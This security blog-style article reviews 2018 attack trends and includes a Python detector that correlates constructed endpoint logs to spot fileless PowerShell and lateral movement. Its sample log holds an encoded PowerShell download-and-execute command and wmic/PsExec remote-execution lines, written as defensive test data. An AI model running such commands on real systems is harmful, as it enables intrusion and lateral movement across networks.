Setting expectations and preparing for a new breed of cyberattacks
While 2016 may have been “The Year of the Fileless Attack” and 2017 “The Year of Ransomware,” 2018 proved to be “The Year of the Next-Gen Cyberattack.”
In 2016, fileless attacks made headlines, including PowerWare and the alleged intrusion at the Democratic National Committee (DNC).
In 2017, the world felt the global effects of ransomware as WannaCry, NotPetya and BadRabbit were discovered.
Then 2018 opened with the disclosure of the Spectre and Meltdown vulnerabilities and went on to bring high-profile, global-scale breaches in which billions of personal records were stolen from household names in government, technology, healthcare, travel and hospitality. More importantly, the year showed that endpoint visibility must become a priority for the year ahead.
As we continue to reflect on the lessons of last year, it is evident that modern cyberattacks appear to be increasingly fueled by geopolitical tension, and they reveal how sophisticated attackers have evolved to remain undetected.
To better understand how the year’s attack landscape will continue to develop and why endpoint visibility will become even more critical, consider the following statistics and their future implications.
IR firms are encountering destructive attacks during 32 percent of investigations.
Most recently, multiple destructive actions have been attributed to Iran and North Korea, where attackers have wiped machines they suspected were being forensically analyzed. As nation-state cyberattackers gain power and sophistication, organizations should expect attacks to become increasingly destructive.
An estimated $1.8 billion of cryptocurrency-related thefts occurred in 2018.
Cryptocurrency exchanges are the most frequently targeted victims of cryptocurrency-focused cybercriminals. Exchanges account for over 27 percent of all reported incidents, making them prime targets for cryptocurrency theft, fraud and the harvesting of user information for follow-on targeting by the same criminals.
While bitcoin remains the leading cryptocurrency for legitimate transactions, cybercriminals are also turning to alternative currencies that are harder to trace and therefore more profitable for them. Monero, for example, is now used in 44 percent of attacks involving cryptocurrency.
Island hopping is involved in half of today's cyberattacks.
Island hopping first targets an organization’s affiliates, often smaller companies with immature security postures. This means that not only is your data at risk, but so is the data at every point in your supply chain - including that of your customers and partners.
Counter incident response is now involved in half of incident response engagements.
Counter incident response means the attacker notices the responders and actively works against them: tampering with or destroying evidence and changing tactics mid-investigation. As attackers become increasingly sophisticated, incident response must get stealthier. The longer-term campaigns that attackers are beginning to orchestrate mean organizations must work harder at preparing their incident response before a breach occurs.
Nearly 60 percent of attacks now involve lateral movement.
Lateral movement is the set of methods cyberattackers use to move through a network from the initial foothold toward the data that is the eventual target of the breach. Continuing to hide in plain sight, cybercriminals lean on non-malware / fileless techniques to do this, which is the clearest sign that attackers are not focused on a single component of an organization but are seeking additional targets as they infiltrate the network.
In order for today's organizations to prepare for these threats, they first need to solve the problem of visibility. True endpoint visibility should allow you to "turn back the clock" and see exactly what happened on an endpoint at any given point in time. To put the scale in perspective: an organization with 10,000 endpoints is estimated to see more than 660 attempted cyberattacks per day.
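The two points above (fileless lateral movement, and endpoint telemetry you can replay) are easier to grasp with a concrete detector. The following is an added example, not code from the original article or from any vendor product. It runs over a handful of constructed, Sysmon-style process-creation records (hosts, users and the encoded command are all made up), tags the indicators a practitioner would look for (an Office process spawning PowerShell, a base64 `-EncodedCommand` payload that downloads and runs code in memory, `wmic /node:` and PsExec launches on the source host, and `services.exe`/`wmiprvse.exe` children on the target host), correlates source and target within a time window, and offers a `timeline()` query that replays one host's recorded activity for a given interval:

```python
import base64
import json
import re
from datetime import datetime, timedelta, timezone

# Constructed -EncodedCommand payload, built here so the sample log line is
# internally consistent. It is not a captured attacker command.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')".encode("utf-16le")
).decode()

# Constructed endpoint telemetry (Sysmon-like process-creation shape, one JSON
# object per line). Hostnames, users and timestamps are hypothetical.
SAMPLE_LOG = "\n".join([
    r'{"ts":"2018-11-05T09:14:02Z","host":"HR-WS07","parent":"explorer.exe","image":"outlook.exe","cmdline":"outlook.exe","user":"CORP\\jdoe"}',
    r'{"ts":"2018-11-05T09:15:40Z","host":"HR-WS07","parent":"outlook.exe","image":"winword.exe","cmdline":"winword.exe /n invoice.docm","user":"CORP\\jdoe"}',
    '{"ts":"2018-11-05T09:15:58Z","host":"HR-WS07","parent":"winword.exe","image":"powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc ' + _ENC + '","user":"CORP\\\\jdoe"}',
    r'{"ts":"2018-11-05T09:31:10Z","host":"HR-WS07","parent":"powershell.exe","image":"wmic.exe","cmdline":"wmic /node:FIN-SRV02 /user:CORP\\svc_backup process call create \"cmd.exe /c whoami\"","user":"CORP\\jdoe"}',
    r'{"ts":"2018-11-05T09:31:14Z","host":"FIN-SRV02","parent":"wmiprvse.exe","image":"cmd.exe","cmdline":"cmd.exe /c whoami","user":"CORP\\svc_backup"}',
    r'{"ts":"2018-11-05T09:40:03Z","host":"HR-WS07","parent":"powershell.exe","image":"psexec.exe","cmdline":"psexec.exe \\\\FIN-SRV02 -u CORP\\svc_backup -s cmd.exe","user":"CORP\\jdoe"}',
    r'{"ts":"2018-11-05T09:40:09Z","host":"FIN-SRV02","parent":"services.exe","image":"PSEXESVC.exe","cmdline":"PSEXESVC.exe","user":"NT AUTHORITY\\SYSTEM"}',
    r'{"ts":"2018-11-05T09:40:10Z","host":"FIN-SRV02","parent":"PSEXESVC.exe","image":"cmd.exe","cmdline":"cmd.exe","user":"NT AUTHORITY\\SYSTEM"}',
    r'{"ts":"2018-11-05T11:02:00Z","host":"FIN-SRV02","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs","user":"NT AUTHORITY\\SYSTEM"}',
])

# -e, -ec, -enc, -EncodedCommand ... followed by a long base64 blob.
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
SHARE_RE = re.compile(r"\\\\([\w.-]+)")          # \\HOST (UNC / PsExec target)
NODE_RE = re.compile(r"/node:([\w.-]+)", re.I)   # wmic /node:HOST
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
REMOTE_PARENTS = {"services.exe", "wmiprvse.exe", "psexesvc.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def utc(ts):
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_events(text):
    """Parse JSON-lines telemetry into dicts, oldest event first."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for ev in events:
        ev["ts"] = utc(ev["ts"])
    return sorted(events, key=lambda e: e["ts"])


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:  # not valid base64 / not UTF-16LE text
        return None


def indicators(ev):
    """Tag one process event with the fileless / lateral-movement indicators it shows."""
    tags = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    decoded = decode_encoded_command(cmd) if image == "powershell.exe" else None
    if decoded is not None:
        tags.append("encoded_powershell")
        if re.search(r"downloadstring|downloadfile|iex|invoke-expression", decoded, re.I):
            tags.append("in_memory_download")   # payload runs without touching disk
    if parent in OFFICE and image in SHELLS:
        tags.append("office_spawned_shell")
    if parent in REMOTE_PARENTS and (image in SHELLS or image == "psexesvc.exe"):
        tags.append("remote_exec_child")        # receiving side of PsExec / WMI execution
    if NODE_RE.search(cmd) or (image == "psexec.exe" and SHARE_RE.search(cmd)):
        tags.append("remote_exec_launch")       # originating side
    return tags


def remote_target(cmdline):
    """Hostname named in a wmic /node: or PsExec \\HOST launch, upper-cased."""
    m = NODE_RE.search(cmdline) or SHARE_RE.search(cmdline)
    return m.group(1).upper() if m else None


def find_lateral_movement(events, window=timedelta(minutes=10)):
    """Pair each remote-exec launch with the first remote-exec child on the named
    target host inside `window`. Returns (src_host, dst_host, launch_ts, child_ts)."""
    tagged = [(ev, indicators(ev)) for ev in events]
    hits = []
    for ev, tags in tagged:
        if "remote_exec_launch" not in tags:
            continue
        target = remote_target(ev["cmdline"])
        for other, otags in tagged:
            if (other["host"].upper() == target and "remote_exec_child" in otags
                    and ev["ts"] <= other["ts"] <= ev["ts"] + window):
                hits.append((ev["host"], other["host"], ev["ts"], other["ts"]))
                break
    return hits


def timeline(events, host, start, end):
    """'Turn back the clock': every recorded event on `host` within [start, end]."""
    return [ev for ev in events if ev["host"] == host and start <= ev["ts"] <= end]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for src, dst, t0, t1 in find_lateral_movement(evs):
        print(f"lateral movement {src} -> {dst}: launched {t0:%H:%M:%S}, child at {t1:%H:%M:%S}")
    for ev in timeline(evs, "FIN-SRV02", utc("2018-11-05T09:30:00Z"), utc("2018-11-05T09:45:00Z")):
        print(f"{ev['ts']:%H:%M:%S} {ev['parent']} -> {ev['image']} {indicators(ev)}")
```

The correlation step is what turns individual alerts into a picture of the attacker's path: the encoded PowerShell on HR-WS07 alone looks like a commodity phishing payload, but paired with the `wmiprvse.exe` and `services.exe` children appearing seconds later on FIN-SRV02 it shows the intruder already moving toward the finance server. Real telemetry will also need the parent/child relationship and the account used (a backup service account running an interactive shell is a second signal here), and the time window should be tuned to your environment's clock skew.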
Yes, in 2018, cybersecurity professionals encountered an increase in cryptomining, fileless attacks, ransomware and commodity malware. But now, as attackers continue to adapt and global tensions continue to heighten, we can expect the growth of techniques such as lateral movement, island hopping and counter incident response to create a year where endpoint visibility becomes even more significant.